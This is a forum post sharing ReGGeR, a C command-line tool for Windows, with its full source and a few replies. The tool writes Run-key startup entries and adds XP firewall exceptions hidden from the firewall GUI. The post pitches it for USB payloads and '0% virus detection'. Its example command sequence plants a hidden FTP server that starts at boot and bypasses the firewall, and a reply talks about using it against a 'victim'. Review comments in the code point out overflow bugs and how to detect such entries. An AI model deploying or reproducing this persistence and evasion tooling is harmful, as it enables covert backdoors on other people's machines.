ReGGeR v1.0

About:
Basically this is my first attempt to write a (somewhat) useful app all in C/C++ that accepts command line arguments, so if the code's a little sloppy, that's why. What this program does is, given a file (such as C:\file.exe), it will add the file (via registry key) to start up with the system, or (if in XP) will add the file to the firewall exception list (very useful for USB payloads).

Features:
- Easily add startup regkeys (XP/Vista/Win7).
- Easily add firewall regkeys (XP Only).
- Firewall keys are automatically hidden from the firewall GUI.
- This program writes directly to the registry so you can add keys even if Regedit is disabled by the admin (assuming you still have write access to the dir).
- Can also create .reg files
- 0% Virus Detection Rate

Examples:
Small file size makes it perfect for USB payloads (why i'm posting it here). For example if you wanted to have a hidden FTP server start everytime the computer turned on, and bypass the filewall all you'd need to do is;
copy .\hidec.exe C:\
copy .\ftpdmin.exe C:\
regger.exe -xpfw C:\ftpdmin.exe ftp
regger.exe -startup "C:\hidec.exe ftpdmin.exe" ftpexec


Notes:
- If the system is running Vista and has UAC enabled, you need to run the program with admin rights
- If you find any bugs, or suggestions for new features please post them!

Download:
ReGGeR v1.0 - 5/12/09
Dev-C++ (Used to Compile)

Source ( .c file included in download above ):
/*************************************************************
  Name: ReGGeR
  Copyright: Fuck that shit
  Author: SableFoXx
  Description: Easily add firewall and startup regkeys
  Version: 1.0
**************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define FN_MAX 255 /* Max file name length, ntfs is 255 */
#define N_STARTUP "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
#define N_XPFW "System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List"

void error(int);

/*
 * Entry point.  Dispatches on argv[1]:
 *   -xpfw     write an XP firewall "authorized application" value (xpfw)
 *   -startup  write an HKLM Run value (strtup)
 *   /? -help /help  print usage (error(0))
 * An optional 5th argument "-mk" writes a .reg file instead of touching
 * the registry (make_file).
 *
 * Accepted argument counts are 2, 4 and 5 (see the first check below).
 * NOTE(review): argc == 2 is only meaningful for the help switches; with
 * argc == 2 and argv[1] == "-xpfw" or "-startup" the code below reaches
 * filexist()/xpfw()/strtup() with argv[2] == argv[argc], which is NULL,
 * and those functions pass it to fopen()/strcpy().
 * NOTE(review): the return value of filexist() is ignored in both
 * branches, so a missing target file is only warned about.
 */
int main(int argc, char * argv[])
{
    /* Local prototypes for the helpers defined later in this file. */
    void xpfw(char* argv[]);
    void strtup(char* argv[]);
    void make_file(char* argv[], int fn);
    int  filexist(char* argv[]);

    if(argc < 4  || 5 < argc) /* Check for correct number of args */
        {
        if(argc != 2)
             {
             error(1);
             return 0;
             }
        }
    if(strcmp(argv[1], "/?") == 0 || strcmp(argv[1], "-help") == 0 || strcmp(argv[1], "/help") == 0)
        {
        error(0);
        return 0;
        }
    /* The else below binds to the inner if (nearest-if rule), so
       argc > 4 with argv[4] != "-mk" reports "Mode does not exist";
       braces around the outer body would make that explicit. */
    if(argc > 4)      
        if((strcmp(argv[4], "-mk")) == 0)
            {
            int fn; /* 1 = startup .reg file, 0 = firewall .reg file */
            if((strcmp(argv[1], "-startup")) == 0)
                fn = 1;
            else
                fn = 0;
            make_file(argv, fn);
            return 0;
            }
        else
            {
            error(2);
            return 0;
            }
    if((strcmp(argv[1], "-xpfw")) == 0)
        {
        FILE *xp;
        /* OS check is a heuristic: the presence of this system file is
           taken to mean Windows XP.  NOTE(review): when the fopen()
           succeeds the handle is never fclose()d. */
        if ((xp = fopen("C:\\WINDOWS\\System32\\wupdmgr.exe", "r")) == NULL )
            {
            error(4); /* Non-XP System */
            return 0;
            }
        filexist(argv);
        xpfw(argv);
        }
    else
        {
        if((strcmp(argv[1], "-startup")) == 0)
            {
            filexist(argv);
            strtup(argv);
            }
        else
            error(2); 
        }
    return 0;
}

/*
 * Add argv[2] as an authorized application in the XP firewall policy.
 *
 * Opens HKLM\<N_XPFW> (the AuthorizedApplications\List key defined at the
 * top of the file) with KEY_SET_VALUE and stores a REG_SZ value whose
 * name is the executable path and whose data is
 * "<path>:*:enabled:@xpsp2res.dll,-22019".  The "@dll,-id" tail looks like
 * an indirect resource-string reference for the entry's display name,
 * which is what the author relies on to keep the entry out of the
 * firewall GUI listing.  Anyone auditing firewall exceptions on such a
 * host should therefore enumerate this registry key directly rather
 * than relying on the control panel.
 *
 * argv[2]  path of the executable to authorize (also used as value name)
 * Reports error(3) if the parent key cannot be opened; the result of
 * RegSetValueEx is not checked.
 *
 * NOTE(review): both strcpy()/strcat() calls are unbounded; an argv[2]
 * longer than FN_MAX-1 bytes (less the appended suffix) overflows the
 * stack buffers.
 * NOTE(review): sizeof(path) hands all FN_MAX bytes of the buffer to
 * RegSetValueEx, so the stored data includes whatever uninitialized
 * bytes followed the terminator; REG_SZ data is conventionally
 * strlen(path) + 1 bytes.
 */
void xpfw(char* argv[])
{
    HKEY hKey;
    char path[FN_MAX];
    char name[FN_MAX];
     
    strcpy(path, argv[2]);
    strcpy(name, argv[2]); /* value name == path, as the firewall key expects */
    strcat(path, ":*:enabled:@xpsp2res.dll,-22019"); //hide from gui

    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, N_XPFW, 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS)
        {
        RegSetValueEx(hKey, name, 0, REG_SZ, (const unsigned char*)path, sizeof(path));
        RegCloseKey(hKey);
        }
    else
        error(3);
}

/*
 * Register argv[2] to run at logon by writing a value under the
 * HKLM\<N_STARTUP> (…\CurrentVersion\Run) key.
 *
 * argv[2]  command line / path stored as the value data (REG_SZ)
 * argv[3]  name of the value to create
 * Reports error(3) if the Run key cannot be opened with KEY_SET_VALUE;
 * the result of RegSetValueEx is not checked.
 *
 * The Run key is a well-known autostart location; registry value-set
 * auditing on this key is the usual way to detect entries created this
 * way, regardless of whether regedit is available on the host.
 *
 * NOTE(review): both strcpy() calls are unbounded; argv[2] or argv[3]
 * longer than FN_MAX-1 bytes overflows the stack buffers.
 * NOTE(review): sizeof(path) writes all FN_MAX bytes, including the
 * uninitialized tail after the terminator, as the value data.
 */
void strtup(char* argv[])
{  
    HKEY hKey;
    char path[FN_MAX];
    char name[FN_MAX];
     
    strcpy(path, argv[2]);
    strcpy(name, argv[3]); 
    
    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, N_STARTUP, 0, KEY_SET_VALUE, &hKey) != ERROR_SUCCESS)
        error(3);
    else
        {   
        RegSetValueEx(hKey, name, 0, REG_SZ, (const unsigned char*)path, sizeof(path));
        RegCloseKey(hKey);
        }
}

/*
 * Probe whether argv[2] can be opened for reading.
 *
 * Returns 0 when fopen() succeeds (the handle is closed again), 1 when it
 * fails; in the failure case a warning is printed but execution continues.
 * Note that a failed fopen() only shows the file is unreadable from here,
 * not necessarily that it is absent.
 */
int filexist(char* argv[])
{
    FILE *probe = fopen(argv[2], "r");
    if (probe != NULL)
        {
        fclose(probe);
        return 0;
        }
    printf("\nWARNING: File does not exist, continuing...");
    return 1;
}

/*
 * Write a .reg file in the current directory instead of touching the
 * registry ("-mk" mode).
 *
 * argv[2]  path to embed as the value data (backslashes are doubled by
 *          print_path so the file parses as a .reg)
 * argv[3]  value name (startup mode only; firewall entries use the path
 *          as their own name)
 * fn       1 -> "startup.reg" targeting the HKLM Run key,
 *          0 -> "xpfw.reg" targeting the XP firewall AuthorizedApplications list
 *
 * The file is closed and reopened in append mode around each print_path
 * call because print_path opens its own handle on the same file.
 *
 * NOTE(review): none of the fopen() results are checked; if the current
 * directory is not writable, fprintf() is called on a NULL stream.
 */
void make_file(char* argv[], int fn)
{
    void print_path(char path[], int fn);
     
    FILE *out;
    char path[FN_MAX];
    strcpy(path, argv[2]); /* NOTE(review): unbounded copy into FN_MAX buffer */
   
    if(fn == 1) /* Header */
        {
        out = fopen("startup.reg", "w");
        fprintf(out, "Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\n");
        fprintf(out, "\"%s\"=\"", argv[3]);
        fclose(out);
        print_path(path, 1);
        out = fopen("startup.reg", "a"); 
        fprintf(out, "\""); /* Suffix */
        }
    else
        {
        out = fopen("xpfw.reg", "w");
        fprintf(out, "Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List]\n\"");
        fclose(out);
        print_path(path, 0); /* Name must be same as path for firewall keys */
        out = fopen("xpfw.reg", "a"); 
        fprintf(out, "\"=\"");  /* Quick Write "=" */
        fclose(out); 
        print_path(path, 0);
        out = fopen("xpfw.reg", "a"); 
        fprintf(out, ":*:Enabled:@xpsp2res.dll,-22019\""); /* Suffix */
        }
    fclose(out); /* closes the handle reopened just above in either branch */
} 


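/*
 * Append path to the .reg file selected by fn, doubling every backslash
 * so the result is a valid .reg string literal.
 *
 * path  NUL-terminated string to write (an empty string writes nothing)
 * fn    1 -> append to "startup.reg", anything else -> "xpfw.reg"
 *
 * If the output file cannot be opened a message is printed and the
 * function returns without writing; the original dereferenced the NULL
 * stream.
 */
void print_path(char path[], int fn)
{
    const char *target = (fn == 1) ? "startup.reg" : "xpfw.reg";
    FILE *out = fopen(target, "a");
    if (out == NULL)
        {
        printf("\nFILE ERROR: Unable to open %s", target);
        return;
        }
    for (size_t i = 0; path[i] != '\0'; i++)
        {
        if (path[i] == '\\')
            fputs("\\\\", out); /* one backslash in, two out */
        else
            fputc(path[i], out);
        }
    fclose(out);
}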

/*
 * Print the diagnostic for error code err (1..4) to stdout; any other
 * code prints the usage text instead.
 */
void error(int err) /* Error Codes */
{
    static const char *const messages[] = {
        NULL,
        "\nUSER ERROR: Wrong number of arguments\n",
        "\nUSER ERROR: Mode does not exist\n",
        "\nPERMISSIONS ERROR: Unable to open parent registry key",
        "\nUSER ERROR: Non-Windows XP operating system in use\n",
    };

    if (err >= 1 && err <= 4)
        {
        fputs(messages[err], stdout);
        return;
        }

    /* Display Usage */
    fputs("\n     * Version 1.0, By SableFoXx *\n", stdout);
    fputs("\n Regger.exe [mode] [file] [name] [make]", stdout);
    fputs("\n     [mode] -startup  Add startup key (XP/Vista/Win7)", stdout);
    fputs("\n            -xpfw     Add firewall exception key (XP Only)", stdout);
    fputs("\n            -help     View this message", stdout);
    fputs("\n     [file] C:\\path\\to\\file.exe", stdout);
    fputs("\n     [name] Name of registry key being created", stdout);
    fputs("\n     [make] -mk  Create a .reg file (Optional)", stdout);
}


Nice piece of code, have to check it out!

I needed something like these so I could modify the registry keys so that the victim is not able to display hidden files in folders :D

I'll try it and let you know how it works!

Nice piece of code, have to check it out!

I needed something like these so I could modify the registry keys so that the victim is not able to display hidden files in folders :D

I'll try it and let you know how it works!

not a bad idea, i may have to add that. been thinking about other regkeys i can through in
